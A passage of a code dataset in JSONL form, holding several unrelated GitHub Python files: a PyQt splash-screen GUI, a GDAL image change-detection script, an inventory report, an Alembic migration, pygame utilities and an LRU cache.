Page\n def change_text(self):\n text = self.ui.ui_pages.lineEdit.text()\n new_text = \"Hello, \" + text\n self.ui.ui_pages.label_3.setText(new_text)\n\n # select_image - Classificador Page\n def select_image(self):\n import tkinter as tk\n from tkinter import filedialog\n root = tk.Tk()\n root.withdraw()\n files = filedialog.askopenfilenames()\n #print(files[0])\n con = Contagem(files[0])\n\n # Reset BTN Selection\n def reset_selection(self):\n for btn in self.ui.left_menu.findChildren(QPushButton):\n try:\n btn.set_active(False)\n except:\n pass\n\n # Btn home function\n def show_page_1(self):\n self.reset_selection()\n self.ui.pages.setCurrentWidget(self.ui.ui_pages.page_1)\n self.ui.btn_1.set_active(True)\n\n # Btn widgets function\n def show_page_2(self):\n self.reset_selection()\n self.ui.pages.setCurrentWidget(self.ui.ui_pages.page_4)\n self.ui.btn_2.set_active(True)\n\n # Btn page settings\n def show_page_3(self):\n self.reset_selection()\n self.ui.pages.setCurrentWidget(self.ui.ui_pages.page_2)\n self.ui.settings_btn.set_active(True)\n\n # Btn Treinamento function\n def show_page_4(self):\n self.reset_selection()\n self.ui.pages.setCurrentWidget(self.ui.ui_pages.page_3)\n self.ui.btn_3.set_active(True)\n\n # Toggle button\n def toggle_button(self):\n # Get menu width\n menu_width = self.ui.left_menu.width()\n\n # Check width\n width = 50\n if menu_width == 50:\n width = 180\n\n # Start animation\n self.animation = QPropertyAnimation(self.ui.left_menu, b\"minimumWidth\")\n self.animation.setStartValue(menu_width)\n self.animation.setEndValue(width)\n self.animation.setDuration(500)\n self.animation.setEasingCurve(QEasingCurve.InOutCirc)\n self.animation.start()\n\n## ==> SPLASHSCREEN WINDOW <== ##\nclass SplashScreen(QMainWindow):\n def __init__(self):\n QMainWindow.__init__(self)\n self.ui = Ui_SplashScreen()\n self.ui.setupUi(self)\n\n ## ==> SET INITIAL PROGRESS BAR TO (0) ZERO\n self.progressBarValue(0)\n\n ## ==> REMOVE STANDARD TITLE BAR\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint) # Remove title bar\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground) # Set background to transparent\n\n ## ==> APPLY DROP SHADOW EFFECT\n self.shadow = QGraphicsDropShadowEffect(self)\n self.shadow.setBlurRadius(20)\n self.shadow.setXOffset(0)\n self.shadow.setYOffset(0)\n self.shadow.setColor(QColor(0, 0, 0, 120))\n self.ui.circularBg.setGraphicsEffect(self.shadow)\n\n
## QTIMER ==> START\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.progress)\n # TIMER IN MILLISECONDS\n self.timer.start(15)\n\n ## SHOW ==> MAIN WINDOW\n ########################################################################\n self.show()\n ## ==> END ##\n\n ## DEF TO LOADING\n ########################################################################\n def progress(self):\n global counter\n global jumper\n value = counter\n\n # HTML TEXT PERCENTAGE\n htmlText = \"\"\"
{VALUE}%\"\"\"\n\n # REPLACE VALUE\n newHtml = htmlText.replace(\"{VALUE}\", str(jumper))\n\n if(value > jumper):\n # APPLY NEW PERCENTAGE TEXT\n self.ui.labelPercentage.setText(newHtml)\n jumper += 10\n\n # SET VALUE TO PROGRESS BAR\n # clamp the value so it never exceeds 100\n if value >= 100: value = 100\n self.progressBarValue(value)\n\n # CLOSE SPLASH SCREEN AND OPEN APP\n if counter > 100:\n # STOP TIMER\n self.timer.stop()\n\n # SHOW MAIN WINDOW\n self.main = MainWindow()\n self.main.show()\n\n # CLOSE SPLASH SCREEN\n self.close()\n\n # INCREASE COUNTER\n counter += 0.5\n\n ## DEF PROGRESS BAR VALUE\n ########################################################################\n def progressBarValue(self, value):\n\n # PROGRESSBAR STYLESHEET BASE\n styleSheet = \"\"\"\n QFrame{\n \tborder-radius: 150px;\n \tbackground-color: qconicalgradient(cx:0.5, cy:0.5, angle:90, stop:{STOP_1} rgba(255, 0, 127, 0), stop:{STOP_2} rgba(85, 170, 255, 255));\n }\n \"\"\"\n\n # GET PROGRESS BAR VALUE, CONVERT TO FLOAT AND INVERT VALUES\n # gradient stops run from 1.000 down to 0.000\n progress = (100 - value) / 100.0\n\n # GET NEW VALUES\n stop_1 = str(progress - 0.001)\n stop_2 = str(progress)\n\n # SET VALUES TO NEW STYLESHEET\n newStylesheet = styleSheet.replace(\"{STOP_1}\", stop_1).replace(\"{STOP_2}\", stop_2)\n\n # APPLY STYLESHEET WITH NEW VALUES\n self.ui.circularProgress.setStyleSheet(newStylesheet)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n app.setWindowIcon(QIcon(\"icon.ico\"))\n window = SplashScreen()\n sys.exit(app.exec())\n\n'''\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n app.setWindowIcon(QIcon(\"icon.ico\"))\n window = MainWindow()\n sys.exit(app.exec())\n'''","repo_name":"Elias-abreu/Projeto_celulas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9743342378","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\"\"\"\nImage change detection.\nImages of the same area taken at different times are differenced pixel by pixel\nto detect changed regions. Works on whole folders.\n\"\"\"\n\ntry:\n from osgeo import gdal\nexcept:\n import gdal\nimport gdalnumeric\nfrom osgeo.gdalconst import *\nfrom glob import glob\nimport os\nimport itertools\nfrom scipy import ndimage\nimport numpy as np\nimport sys\nfrom datetime import datetime\n\n\ndef get_tif_path(file1,file2):\n '''\n Return the paths of matching tif/tiff images.\n :param file1: first folder\n :param file2: second folder\n :return: pairs of corresponding image paths to compare\n '''\n file1_path = []\n [file1_path.append(glob(os.path.join(file1, '*/' * i, '*.tif'))) for i in range(3)] # only walk 3 directory levels\n [file1_path.append(glob(os.path.join(file1, '*/' * i, '*.tiff'))) for i in range(3)]\n file1_path = list(itertools.chain.from_iterable(file1_path)) # flatten to a 1-D list\n\n file2_path = []\n [file2_path.append(glob(os.path.join(file2, '*/' * i, '*.tif'))) for i in range(3)]\n [file2_path.append(glob(os.path.join(file2, '*/' * i, '*.tiff'))) for i in range(3)]\n file2_path = list(itertools.chain.from_iterable(file2_path)) # flatten to a 1-D list\n\n # pair each file1_path entry with its file2_path counterpart\n file_path=[]\n for img in file1_path:\n img_name = img.split('/')[-1].split('.')[0] # '/' on Linux; '\\\\' on Windows\n for img2 in file2_path:\n if img_name in img2:\n file_path.append([img,img2])\n file2_path.remove(img2)\n break\n\n return [file1_path,file_path]\n\ndef get_geoPosition(file_path):\n '''\n Parse every image in the folder and work out the overall geographic extent:\n the top-left-most and bottom-right-most geographic coordinates.\n :param file_path: paths of the input tif images\n :return: geographic coordinates, spatial reference parameters and the merged image size\n '''\n gdal.SetConfigOption(\"GDAL_FILENAME_IS_UTF8\", \"NO\")\n gdal.AllRegister()\n\n flag = True
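\n # Geotransform recap (GDAL convention): Xgeo = GT[0] + col*GT[1] + row*GT[2] and\n # Ygeo = GT[3] + col*GT[4] + row*GT[5]; for a north-up image GT[5] is negative,\n # which is why the bottom edge computed below comes out as the smaller Y value.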
\n\n # loop over every image to find the top-left-most and bottom-right-most geographic coordinates\n for file in file_path:\n srcDS = gdal.Open(file, GA_ReadOnly) # open the source image read-only\n geoTrans = srcDS.GetGeoTransform() # the six geotransform parameters\n # srcPro = srcDS.GetProjection() # spatial reference\n srcXSize = srcDS.RasterXSize # width\n srcYSize = srcDS.RasterYSize # height\n\n # top-left coordinate of the source image: (geoTrans[0],geoTrans[3])\n srcX=geoTrans[0]\n srcY=geoTrans[3]\n # bottom-right coordinate of the source image (geographic)\n srcX2 = geoTrans[0] + srcXSize * geoTrans[1] + srcYSize * geoTrans[2]\n srcY2 = geoTrans[3] + srcXSize * geoTrans[4] + srcYSize * geoTrans[5] # the Y coordinate decreases; geoTrans[5] is negative\n\n if flag:\n srcPro = srcDS.GetProjection()\n\n left_top_X = srcX\n left_top_Y = srcY\n right_bottom_X = srcX2\n right_bottom_Y = srcY2\n flag = False\n\n\n if left_top_X > srcX: left_top_X = srcX\n if left_top_Y < srcY: left_top_Y = srcY\n\n if right_bottom_X<srcX2:right_bottom_X=srcX2\n if right_bottom_Y>srcY2:right_bottom_Y=srcY2\n\n # Create a new geomatrix for the image\n geoTrans2 = list(geoTrans)\n # reset the top-left geographic coordinate\n\n geoTrans2[0] = left_top_X\n geoTrans2[3] = left_top_Y\n\n # size of the mosaic covering all the images\n Xsize = np.ceil((right_bottom_X - left_top_X) / geoTrans[1])\n Ysize = np.ceil((right_bottom_Y - left_top_Y) / geoTrans[5])\n\n return [geoTrans2,srcPro,Xsize,Ysize]\n\ndef Image_contrast_detection(img1_path,img2_path,img_save):\n '''\n Compare two images and write the resulting change mask (works on exactly two images at a time).\n :param img1_path: path of image one\n :param img2_path: path of image two\n :param img_save: output folder for the result\n :return: comparison result for the image pair\n '''\n\n # needed so that GDAL accepts non-ASCII paths\n gdal.SetConfigOption(\"GDAL_FILENAME_IS_UTF8\", \"NO\")\n\n gdal.AllRegister() # register drivers\n\n # assert len(sys.argv) >= 4, \"Not enough arguments. Usage:\\n python test.py image1 image2 output_path\"\n\n # img1_path = sys.argv[1]\n # img2_path = sys.argv[2]\n\n img_name = img2_path.split('/')[-1].split('.')[0] # '/' on Linux; '\\\\' on Windows\n\n src_ds1 = gdal.Open(img1_path)\n ibands1 = src_ds1.RasterCount\n xcount1 = src_ds1.RasterXSize\n ycount1 = src_ds1.RasterYSize\n\n geoTrans1 = src_ds1.GetGeoTransform()\n srcPro1 = src_ds1.GetProjection()\n\n assert ibands1 >= 3, '%s has fewer than 3 bands' % img1_path\n\n data_type = np.float32\n\n srcband = src_ds1.GetRasterBand(1)\n # R1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n R1 = srcband.ReadRaster(0, 0, xcount1, ycount1)\n R1 = np.fromstring(R1, np.uint8)\n R1 = np.reshape(R1, [ycount1, xcount1]).astype(data_type)\n\n srcband = src_ds1.GetRasterBand(2)\n # G1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n G1 = srcband.ReadRaster(0, 0, xcount1, ycount1)\n G1 = np.fromstring(G1, np.uint8)\n G1 = np.reshape(G1, [ycount1, xcount1]).astype(data_type)\n\n srcband = src_ds1.GetRasterBand(3)\n # B1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n B1 = srcband.ReadRaster(0, 0, xcount1, ycount1)\n B1 = np.fromstring(B1, np.uint8)\n B1 = np.reshape(B1, [ycount1, xcount1]).astype(data_type)\n\n src_ds1 = None\n src_ds2 = gdal.Open(img2_path)\n ibands2 = src_ds2.RasterCount\n xcount2 = src_ds2.RasterXSize\n ycount2 = src_ds2.RasterYSize\n\n geoTrans2 = src_ds2.GetGeoTransform()\n srcPro2 = src_ds2.GetProjection()\n\n assert ibands2 >= 3, '%s has fewer than 3 bands' % img2_path\n\n assert ibands1 == ibands2, 'the two images have different band counts'\n assert xcount1 == xcount2, 'the two images have different widths'\n assert ycount1 == ycount2, 'the two images have different heights'\n assert geoTrans1 == geoTrans2, 'the two images have different geotransforms'\n assert srcPro1 == srcPro2, 'the two images have different projections'\n\n srcband = src_ds2.GetRasterBand(1)\n # R2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n R2 = srcband.ReadRaster(0, 0, xcount2, ycount2)\n R2 = np.fromstring(R2, np.uint8)\n R2 = np.reshape(R2, [ycount2, xcount2]).astype(data_type)\n\n srcband = src_ds2.GetRasterBand(2)\n # G2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n G2 = srcband.ReadRaster(0, 0, xcount2, ycount2)\n G2 = np.fromstring(G2, np.uint8)\n G2 = np.reshape(G2, [ycount2, xcount2]).astype(data_type)\n\n srcband = src_ds2.GetRasterBand(3)\n # B2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n B2 = srcband.ReadRaster(0, 0, xcount2, ycount2)\n B2 = np.fromstring(B2, np.uint8)\n B2 = np.reshape(B2, [ycount2, xcount2]).astype(data_type)\n\n # per-image band differences\n img1 = abs(R1 - G1) + abs(R1 - B1) + abs(G1 - B1)\n\n img2 = abs(R2 - G2) + abs(R2 - B2) + abs(G2 - B2)\n\n # rescale pixels\n img1 = (img1 - np.min(img1, 0)) / (np.max(img1, 0) - np.min(img1, 0) + 0.001)\n img2 = (img2 - np.min(img2, 0)) / (np.max(img2, 0) - np.min(img2, 0) + 0.001)\n\n img = abs(img1 - img2)\n\n img = img - np.mean(img, 0) * 1.1 + np.var(img, 0) * 2 # subtract the threshold\n\n # clamp negative values to 0\n img = np.maximum(img, 0)\n\n # a median filter preserves edges better\n img = ndimage.median_filter(img, 5)\n\n # where a source image has pixel value 0 there is no data, so skip detection by zeroing img there\n mask1 = (R1 != 0).astype(np.float32)\n mask2 = (R2 != 0).astype(np.float32)\n img = img * mask1 * mask2\n\n # write the result image\n\n # raster_fn = os.path.join(sys.argv[3], img_name + '_mask.tif')\n\n raster_fn = os.path.join(img_save, img_name + '_mask.tif')\n\n target_ds = gdal.GetDriverByName('GTiff').Create(raster_fn, xcount1, ycount1, 1, gdal.GDT_Byte)\n target_ds.SetGeoTransform(geoTrans1) # geotransform of the mask\n target_ds.SetProjection(srcPro1) # spatial reference of the mask\n\n target_ds.GetRasterBand(1).WriteArray(img, 0, 0)\n # target_ds.GetRasterBand(1).WriteRaster(0,0,xcount1,ycount1,img.tobytes())\n # [target_ds.GetRasterBand(1).WriteArray(img, 0, i) for i in ycount1]\n target_ds.FlushCache()\n\n target_ds = None\n src_ds = None\n
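\n\n# A minimal, self-contained sketch of the same differencing pipeline on synthetic\n# arrays (illustrative only: the shapes, the random data and the helper name are\n# made up here; the formulas and the 5x5 median window mirror the code above).\ndef _demo_change_pipeline(h=64, w=64):\n rng = np.random.RandomState(0)\n r1, g1, b1, r2, g2, b2 = [rng.randint(0, 256, (h, w)).astype(np.float32) for _ in range(6)]\n img1 = abs(r1 - g1) + abs(r1 - b1) + abs(g1 - b1) # per-image band contrast\n img2 = abs(r2 - g2) + abs(r2 - b2) + abs(g2 - b2)\n img1 = (img1 - np.min(img1, 0)) / (np.max(img1, 0) - np.min(img1, 0) + 0.001) # column-wise rescale\n img2 = (img2 - np.min(img2, 0)) / (np.max(img2, 0) - np.min(img2, 0) + 0.001)\n diff = abs(img1 - img2)\n diff = np.maximum(diff - np.mean(diff, 0) * 1.1 + np.var(diff, 0) * 2, 0) # threshold, clamp at 0\n return ndimage.median_filter(diff, 5) # suppress isolated detections\n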
\ndef Image_detection(img_path):\n '''\n Run the comparison and return the result as a numpy array plus the image's geotransform.\n :param img_path: img_path[0] is image one, img_path[1] is image two\n :return:\n '''\n data_type = np.float32\n\n src_ds1 = gdal.Open(img_path[0], GA_ReadOnly)\n ibands1 = src_ds1.RasterCount\n xcount1 = src_ds1.RasterXSize\n ycount1 = src_ds1.RasterYSize\n\n geoTrans1 = src_ds1.GetGeoTransform()\n srcPro1 = src_ds1.GetProjection()\n\n assert ibands1 >= 3, '%s has fewer than 3 bands' % img_path[0]\n srcband = src_ds1.GetRasterBand(1)\n R1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n\n srcband = src_ds1.GetRasterBand(2)\n G1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n\n srcband = src_ds1.GetRasterBand(3)\n B1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n src_ds1 = None\n\n src_ds2 = gdal.Open(img_path[1], GA_ReadOnly)\n ibands2 = src_ds2.RasterCount\n xcount2 = src_ds2.RasterXSize\n ycount2 = src_ds2.RasterYSize\n\n geoTrans2 = src_ds2.GetGeoTransform()\n srcPro2 = src_ds2.GetProjection()\n\n assert ibands2 >= 3, '%s has fewer than 3 bands' % img_path[1]\n\n assert ibands1 == ibands2, 'the two images have different band counts'\n assert xcount1 == xcount2, 'the two images have different widths'\n assert ycount1 == ycount2, 'the two images have different heights'\n assert geoTrans1 == geoTrans2, 'the two images have different geotransforms'\n assert srcPro1 == srcPro2, 'the two images have different projections'\n\n srcband = src_ds2.GetRasterBand(1)\n R2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n\n srcband = src_ds2.GetRasterBand(2)\n G2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n\n srcband = src_ds2.GetRasterBand(3)\n B2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n\n src_ds2 = None\n # per-image band differences\n img1 = abs(R1 - G1) + abs(R1 - B1) + abs(G1 - B1)\n\n img2 = abs(R2 - G2) + abs(R2 - B2) + abs(G2 - B2)\n\n # rescale pixels\n img1 = (img1 - np.min(img1, 0)) / (np.max(img1, 0) - np.min(img1, 0) + 0.001)\n img2 = (img2 - np.min(img2, 0)) / (np.max(img2, 0) - np.min(img2, 0) + 0.001)\n\n img = abs(img1 - img2)\n\n img = img - np.mean(img, 0) * 1.1 + np.var(img, 0) * 2 # subtract the threshold\n\n # clamp negative values to 0\n img = np.maximum(img, 0)\n\n # a median filter preserves edges better\n img = ndimage.median_filter(img, 5)\n\n # where a source image has pixel value 0 there is no data, so skip detection by zeroing img there\n mask1 = (R1 != 0).astype(np.float32)\n mask2 = (R2 != 0).astype(np.float32)\n img = img * mask1 * mask2\n\n return img,geoTrans1\n
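\n# Note on the threshold step in both functions above: np.mean(img, 0) and\n# np.var(img, 0) reduce along axis 0, so every image column gets its own cut-off\n# (1.1x the column mean, offset by 2x the column variance) before negatives are\n# clamped to zero.\n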
\ndef Image_contrast_detection2(file1, file2, img_save):\n '''\n Compare the images in two folders and write one merged result image for all of them (folder mode).\n :param file1_path: folder 1\n :param file2_path: folder 2\n :param img_save: output path for the result\n :return: comparison results for the matching images of folders 1 and 2\n '''\n\n # needed so that GDAL accepts non-ASCII paths\n gdal.SetConfigOption(\"GDAL_FILENAME_IS_UTF8\", \"NO\")\n\n gdal.AllRegister() # register drivers\n\n # assert len(sys.argv) >= 4, \"Not enough arguments. Usage:\\n python test.py image1 image2 output_path\"\n\n # img1_path = sys.argv[1]\n # img2_path = sys.argv[2]\n\n [img1_paths,img_paths]=get_tif_path(file1,file2)\n\n info_struct=get_geoPosition(img1_paths)\n img1_paths=None\n flag = True\n i=0\n # data_type = np.float32\n for img_path in img_paths:\n\n sys.stdout.write('\\r>> The program is calculating... %d/%d' % (\n i + 1, len(img_paths))) # progress output\n sys.stdout.flush()\n\n # img_name = img_path[0].split('/')[-1].split('.')[0] # '/' on Linux; '\\\\' on Windows\n img,geoTrans=Image_detection(img_path)\n\n if flag:\n # output result image\n\n # raster_fn = os.path.join(sys.argv[3], img_name + '_mask.tif')\n\n raster_fn = img_save+'_mask.tif'\n\n # target_ds = gdal.GetDriverByName('GTiff').Create(raster_fn, xcount1, ycount1, 1, gdal.GDT_Byte)\n target_ds = gdal.GetDriverByName('GTiff').Create(raster_fn, int(info_struct[2]), int(info_struct[3]), 1, gdal.GDT_Byte)\n target_ds.SetGeoTransform(info_struct[0]) # geotransform of the mask\n target_ds.SetProjection(info_struct[1]) # spatial reference of the mask\n flag=False\n\n # work back from geographic coordinates to row/column offsets in the mosaic\n xoff = np.ceil((geoTrans[0] - info_struct[0][0]) / geoTrans[1])\n yoff = np.ceil((geoTrans[3] - info_struct[0][3]) / geoTrans[5])\n\n target_ds.GetRasterBand(1).WriteArray(img, int(xoff), int(yoff))\n # target_ds.GetRasterBand(1).WriteRaster(0,0,xcount1,ycount1,img.tobytes())\n # [target_ds.GetRasterBand(1).WriteArray(img, 0, i) for i in ycount1]\n target_ds.FlushCache()\n i += 1\n sys.stdout.write('\\n')\n sys.stdout.flush()\n target_ds = None\n\n\nif __name__==\"__main__\":\n assert len(sys.argv) >= 4, \"Not enough arguments. Usage:\\n python test.py folder1 folder2 output_path\"\n\n file1_path = sys.argv[1]\n file2_path = sys.argv[2]\n img_save=sys.argv[3]\n\n # file1_path = r'E:\\05'\n # file2_path = r\"E:\\06\"\n # img_save = r'E:\\\\'\n\n start_time = datetime.now()\n Image_contrast_detection2(file1_path, file2_path, img_save)\n end_time = datetime.now()\n print((end_time - start_time).total_seconds())\n","repo_name":"wucng/Tensorflow","sub_path":"图像对比检测/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10367723497","text":"from collections import Counter\nfrom datetime import datetime\n\n\nclass SimpleReport:\n @classmethod\n def fabricacao_mais_antiga(cls, stock):\n now = datetime.today()\n dateArray = []\n for item in stock:\n if datetime.strptime(item[\"data_de_fabricacao\"], \"%Y-%m-%d\") < now:\n dateArray.append(item[\"data_de_fabricacao\"])\n\n return f\"Data de fabricação mais antiga: {min(dateArray)}\"\n\n @classmethod\n def validade_mais_proxima(cls, stock):\n now = datetime.today()\n dateArray = []\n for item in stock:\n if datetime.strptime(item[\"data_de_validade\"], \"%Y-%m-%d\") 
> now:\n dateArray.append(item[\"data_de_validade\"])\n\n return f\"Data de validade mais próxima: {min(dateArray)}\"\n\n @classmethod\n def empresa_com_maior_estoque(cls, stock):\n emp = [obj[\"nome_da_empresa\"] for obj in stock]\n return (\n \"Empresa com maior quantidade de produtos estocados: \"\n + Counter(emp).most_common()[0][0]\n )\n\n @classmethod\n def generate(cls, stock):\n return (\n f\"{cls.fabricacao_mais_antiga(stock)}\\n\"\n f\"{cls.validade_mais_proxima(stock)}\\n\"\n f\"{cls.empresa_com_maior_estoque(stock)}\\n\"\n )\n","repo_name":"amosrodrigues/trybe","sub_path":"Desenvolvimento-Back-End/projects-backend/invetory-report/inventory_report/reports/simple_report.py","file_name":"simple_report.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38500843707","text":"\"\"\"First migration\n\nRevision ID: 26934fe401c1\nRevises: None\nCreate Date: 2019-07-01 15:48:39.561105\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '26934fe401c1'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('phone', sa.String(length=64), nullable=True),\n sa.Column('currentPlan', sa.String(length=64), nullable=True),\n sa.Column('personalInfo', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_users_phone'), 'users', ['phone'], unique=True)\n op.create_table('data',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('userId', sa.Integer(), nullable=True),\n sa.Column('isUser', sa.Boolean(), nullable=False),\n sa.Column('content', sa.String(length=256), nullable=True),\n sa.Column('time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['userId'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('records',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('userId', sa.Integer(), nullable=True),\n sa.Column('date', sa.Date(), nullable=False),\n sa.Column('isSlept', sa.Boolean(), nullable=False),\n sa.Column('reason', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['userId'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('records')\n op.drop_table('data')\n op.drop_index(op.f('ix_users_phone'), table_name='users')\n op.drop_table('users')\n # ### end Alembic commands ###\n","repo_name":"timoderbeste/sleep-tracking-bot","sub_path":"emile/migrations/versions/26934fe401c1_first_migration.py","file_name":"26934fe401c1_first_migration.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36389043065","text":"#! 
/usr/bin/env python3\n\nfrom functools import cached_property\nfrom dataclasses import dataclass\nfrom typing import Dict, Optional\n\nfrom bs4 import BeautifulSoup # type: ignore\nfrom bs4.element import Tag # type: ignore\nfrom dataclasses_json import DataClassJsonMixin\n\n\n@dataclass\nclass FishWeatherPreferences(DataClassJsonMixin):\n weathers: Dict[str, int]\n unique_catches_across_all_weathers: int\n\n @cached_property\n def weather_percentage(self) -> Dict[str, float]:\n return {k: v / self.unique_catches_across_all_weathers for k, v in self.weathers.items()}\n\n @staticmethod\n async def _parse_weathers(weather_table: Tag) -> Dict[str, int]:\n temp_weather: Dict[str, int] = dict()\n # noinspection SpellCheckingInspection\n tbody: Tag = weather_table.find_all('tbody')[1]\n\n for tr in tbody.find_all('tr'):\n td1, td2 = tr.find_all('td') # type: Tag, Tag\n weather_name: str = td1.find('span', {'class': 'weather_name'}).text.strip()\n cw_bar: Tag = td2.find('div', {'class': 'cw_bar'})\n\n weather_catches: int = int(cw_bar.attrs['title'].split('/')[0])\n temp_weather[weather_name] = weather_catches\n\n return temp_weather\n\n @staticmethod\n async def _parse_unique_catches_across_all_weathers(weather_table: Tag) -> int:\n num_holder = weather_table.find('span', {'class': 'small'})\n return int(num_holder.find('b').text.strip())\n\n @classmethod\n async def get_weather_preferences_from_fish_soup(cls, soup: BeautifulSoup) -> Optional['FishWeatherPreferences']:\n weather_table: Tag = soup.find('table', {'class': 'info_section chart_weather'})\n\n if not weather_table:\n return None\n\n return cls(\n weathers=await cls._parse_weathers(weather_table),\n unique_catches_across_all_weathers=await cls._parse_unique_catches_across_all_weathers(weather_table)\n )\n","repo_name":"joshua-software-dev/FF14AnglerParser","sub_path":"ff14angler/dataClasses/fish/fishWeatherPreferences.py","file_name":"fishWeatherPreferences.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14429174268","text":"import sys\n\nimport pygame\n\nSCREEN_DIM = 800\nCONSTRAINT = 72\nDEFAULT_STEP_SIZE = 100\n\n\ndef quitLoopConditional(started):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n started = False\n pygame.quit()\n sys.exit()\n\n\n# @:param value to scale to display size for global size\ndef scaled_value(x, isRelative=False):\n scaled_val = None\n if isRelative is False:\n scaled_val = int(x * (SCREEN_DIM / (CONSTRAINT * 2)))\n if isRelative is not False:\n scaled_val = int((x - (-CONSTRAINT)) * (SCREEN_DIM / (CONSTRAINT * 2)))\n return scaled_val\n\n\n# @:param size of the object in inches\n# @:param path to where the image of robot visualizer resides to load and scale to display size\ndef load_image(size, pathToImage, alpha=None):\n if alpha is None:\n surface = pygame.image.load(pathToImage).convert()\n return pygame.transform.scale(surface, (int(scaled_value(size)),\n int(scaled_value(size))))\n\n if alpha is not None:\n surface = pygame.image.load(pathToImage).convert_alpha()\n return pygame.transform.scale(surface, (int(scaled_value(size)),\n int(scaled_value(size))))\n","repo_name":"amangalampalli/SplineTrajectoryGenerator","sub_path":"visualizer/utilities/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32625660505","text":"# Implements an LRU 
cache\n\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n self.prev = None\n \n\nclass DoublyLinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def add(self, node):\n if not self.head and not self.tail:\n self.head = node\n self.tail = node\n \n elif self.head != node:\n self.head.next = node\n node.prev = self.head\n self.head = node\n \n def peek_head(self):\n return self.head.value\n \n def pop_tail(self):\n if self.tail:\n node = self.tail\n self.tail = node.prev\n \n if self.tail:\n self.tail.next = None\n\n return node.value\n \n return None\n \n def set_head(self, node):\n if node.prev:\n node.prev.next = node.next\n\n if node.next:\n node.next.prev = node.prev\n\n self.add(node)\n\n\nclass LRUCache:\n # O(1) time\n def __init__(self, size):\n self.max_size = size or 1\n self.cache = dict()\n self.keys = DoublyLinkedList()\n\n # O(1) time\n def insert_key_value_pair(self, key, value): \n if key not in self.cache:\n if len(self.cache) == self.max_size:\n self.pop_least_recent_key()\n\n node = Node((key, value))\n self.keys.add(node)\n self.cache[key] = node\n\n else:\n self.cache[key].value = (key, value)\n \n # O(1) time\n def get_most_recent_key(self):\n return self.keys.peek_head()[0]\n \n # O(1) time\n def pop_least_recent_key(self):\n least_recent = self.keys.pop_tail()\n del self.cache[least_recent[0]]\n\n # O(1) time\n def get_value_from_key(self, key):\n if key in self.cache:\n node = self.cache[key]\n self.keys.set_head(node)\n return node.value[1]\n \n return None\n\n\nif __name__ == \"__main__\":\n cache = LRUCache(3)\n cache.insert_key_value_pair(\"b\", 2)\n cache.insert_key_value_pair(\"a\", 1)\n cache.insert_key_value_pair(\"c\", 3)\n assert cache.get_most_recent_key() == \"c\"\n assert cache.get_value_from_key(\"a\") == 1\n assert cache.get_most_recent_key() == \"a\"\n cache.insert_key_value_pair(\"d\", 4)\n assert cache.get_value_from_key(\"b\") == None\n cache.insert_key_value_pair(\"a\", 5)\n cache.get_value_from_key(\"a\") == 5\n print(\"You're all set!\")","repo_name":"tobeyOguney/Zoo-of-Algorithms","sub_path":"LRU Cache/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"23815461278","text":"import datetime\nimport re\n\nimport pyparsing\nfrom pyparsing import Optional\nfrom dateutil.relativedelta import relativedelta\nfrom kronosparser import utils\nfrom kronosparser.time_interval import TimeInterval\nfrom kronosparser.word_number import units\n\n_BEGINNING = 1\n_MIDDLE = 2\n_END = 3\n\n_CENTURY_CHANGE = 30\n\n\ndef utc_now():\n return 